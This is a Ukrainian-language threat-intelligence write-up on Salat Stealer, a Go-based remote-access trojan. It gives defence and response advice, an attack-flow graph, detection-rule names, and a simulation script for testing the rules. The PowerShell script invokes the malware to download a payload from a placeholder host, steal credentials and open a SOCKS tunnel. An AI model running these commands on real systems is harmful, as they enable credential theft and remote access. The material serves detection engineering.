Аналіз Salat Stealer: Go-основний RAT, стійкість C2 та можливості викрадення інформації
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Salat Stealer – це троянець віддаленого доступу на основі Go, який функціонує як повнофункціональна структура для постексплуатації. Він підтримує кілька каналів зв’язку, включаючи WebSocket, HTTP/2, HTTP/3 і QUIC, що надає операторам гнучкі та надійні варіанти командування і контролю. Шкідливе програмне забезпечення також містить широкі можливості викрадення облікових даних, націлюючись на дані браузера, криптовалютні гаманці, натискання клавіш, знімки екрану та мережеве переключення через SOCKS5. Щоб вижити після перезавантаження, воно використовує приховані копії файлів, заплановані завдання та реєстраційний ключ Run. Якщо його основна інфраструктура порушена, шкідливе програмне забезпечення може отримати оновлені деталі керування та контролю через блокчейн TON.
Розслідування
Аналіз пояснює, як шкідливе програмне забезпечення отримує ключі шифрування зі статичних рядків, поєднаних із ім’ям хоста жертви, а потім використовує їх для дешифрування п’яти вбудованих URL-адрес командування та контролю. Дослідники також задокументували, як Salat Stealer вибирає свій транспортний протокол, обробляє команди операторів, намагається підвищити привілеї та розгортає кілька методів стійкості на хості. У звіті також представлені різні види викрадених даних і ширші функції віддаленого доступу, доступні атакуючому.
Захист
Захисники повинні контролювати з’єднання з виявленими URL-адресами командування та контролю, а також несподіваний трафік QUIC і WebSocket в невідомі місця призначення. Команди безпеки також повинні стежити за прихованими запланованими завданнями та підозрілими записами ключів Run, які вказують на невідомі виконувані файли. Список дозволених програм і суворий контроль виконання можуть допомогти запобігти запуску навантаження на основі Go. Сегментація мережі та перевірка TLS можуть ще більше покращити видимість підозрілого вихідного трафіку, пов’язаного зі шкідливим програмним забезпеченням.
Реагування
Якщо виявлено активність Salat Stealer, негайно ізолюйте уражену систему, зберіть зразки пам’яті та диска та зупиніть шкідливі процеси. Видаліть усі артефакти стійкості, включаючи заплановані завдання, записи ключів Run та приховані копії файлів, які використовуються шкідливим програмним забезпеченням. Виявлені домени командування та керування повинні бути заблоковані разом із будь-якими пов’язаними запитами блокчейну TON, які використовуються для пошуку резервної інфраструктури. Викриті облікові дані та криптовалютні гаманці також слід терміново змінити чи захистити.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc malware_salatr[“<b>Шкідливе ПЗ</b> – Назва: Salat Stealer (Go RAT)<br/>Опис: Go-базований троян віддаленого доступу, використовується для крадіжки даних, закріплення та бокового переміщення”] class malware_salatr malware process_start[“Процес: запуск SalatStealer.exe”] class process_start process malware_salatr –> process_start persistence_task[“Постійність: приховане заплановане завдання”] class persistence_task action persistence_reg[“Реєстр: ключ Run (HKCU\\Run)”] class persistence_reg action process_start –> persistence_task process_start –> persistence_reg defense_evasion[“Уникнення: обфускація коду”] class defense_evasion action process_start –> defense_evasion discovery[“Розвідка системи”] class discovery action process_start –> discovery credential_access[“Викрадення облікових даних + кейлогінг”] class credential_access action process_start –> credential_access collection[“Збір даних: скриншоти, відео, ZIP-архіви”] class collection action credential_access –> collection c2[“C2: WebSocket/QUIC зв’язок”] class c2 action collection –> c2 exfiltration[“Вивантаження даних через C2”] class exfiltration action c2 –> exfiltration command_exec[“Виконання віддалених команд”] class command_exec action exfiltration –> command_exec lateral[“Бокове переміщення через SOCKS5”] class lateral action command_exec –> lateral
Потік атаки
Виявлення
Підозрілі команди та контроль через запити DNS з незвичними доменами верхнього рівня (через dns)
Перегляд
Можливі точки стійкості [ASEP – Програмне забезпечення/NTUSER Hive] (через registry_event)
Перегляд
Виконання системних процесів з нетипових шляхів (через process_creation)
Перегляд
Індикатори компрометації (HashSha256), щоб виявити: Аналіз Salat Stealer на основі Go RAT C2 Стійкість та можливості викрадення інформації
Перегляд
Індикатори компрометації (HashSha1), щоб виявити: Аналіз Salat Stealer на основі Go RAT C2 Стійкість та можливості викрадення інформації
Перегляд
Індикатори компрометації (HashMd5), щоб виявити: Аналіз Salat Stealer на основі Go RAT C2 Стійкість та можливості викрадення інформації
Перегляд
Виявлення дій Salat Stealer RAT [Windows Sysmon]
Перегляд
Виявлення моделей комунікації Salat Stealer C2 [Windows Network Connection]
Перегляд
Виконання Salat Stealer та виявлення моди [Windows Process Creation]
Перегляд
Імітаційне виконання
Передумова: Телеметрія та перевірка базової лінії повинні бути завершені.
Раціональне пояснення: Цей розділ описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на створення очікуваної телеметрії детекційною логікою.
-
Наратив атаки та команди:
Зловмисник доставив двійковий файл Salat RAT (salat.exe) на комп’ютер жертви через вкладення в фішинговому листі. Отримавши низькорівневе закріплення, злочинець виконує двійковий файл із певними аргументами, щоб:- Завантажити вторинне навантаження –
main.downloadFile https://malicious.example.com/payload.exe. - Вкрасти збережені облікові дані –
main.Steal -module credentials. - Встановити одноранговий тунель SOCKS для латерального переміщення –
main.p2pSocks -listen 1080 -remote 10.0.0.5:4444.
Двійковий файл запускається з підвищеної сесії PowerShell, щоб задовольнити вимогу підвищення (T1548). Кожне викликання відображається як окремий процес Sysmon зі створенням процесу з відповідною командною лінією, що задовольняє співставлення з рядком правила Sigma.
- Завантажити вторинне навантаження –
-
Скрипт тестування регресії:
# ------------------------------------------------- # Скрипт імітації Salat RAT – викликає виявлення # ------------------------------------------------- $binaryPath = "C:Tempsalat.exe" # Переконайтеся, що двійковий файл існує (плейсхолдер – у реальному тесті двійковий файл буде попередньо підготовлений) if (-Not (Test-Path $binaryPath)) { Write-Error "Двійковий файл Salat не знайдений за адресою $binaryPath" exit 1 } # 1. Завантажити вторинне навантаження Start-Process -FilePath $binaryPath -ArgumentList "main.downloadFile https://malicious.example.com/payload.exe" -Wait # 2. Вкрасти облікові дані Start-Process -FilePath $binaryPath -ArgumentList "main.Steal -module credentials" -Wait # 3. Відкрити P2P SOCKS тунель Start-Process -FilePath $binaryPath -ArgumentList "main.p2pSocks -listen 1080 -remote 10.0.0.5:4444" -Wait Write-Host "Імітація завершена." -
Команди очищення:
# ------------------------------------------------- # Очищення для імітації Salat RAT # ------------------------------------------------- # Завершити будь-які залишкові процеси Salat Get-Process -Name "salat" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалити двійковий файл (якщо дозволено) $binaryPath = "C:Tempsalat.exe" if (Test-Path $binaryPath) { Remove-Item $binaryPath -Force Write-Host "Видалено $binaryPath" } # За необхідності очистити пов’язані події Sysmon з тестового індексу (приклад Splunk) # splunk cmd search '| delete index=main host="test-host" sourcetype="Sysmon" earliest=-24h latest=now'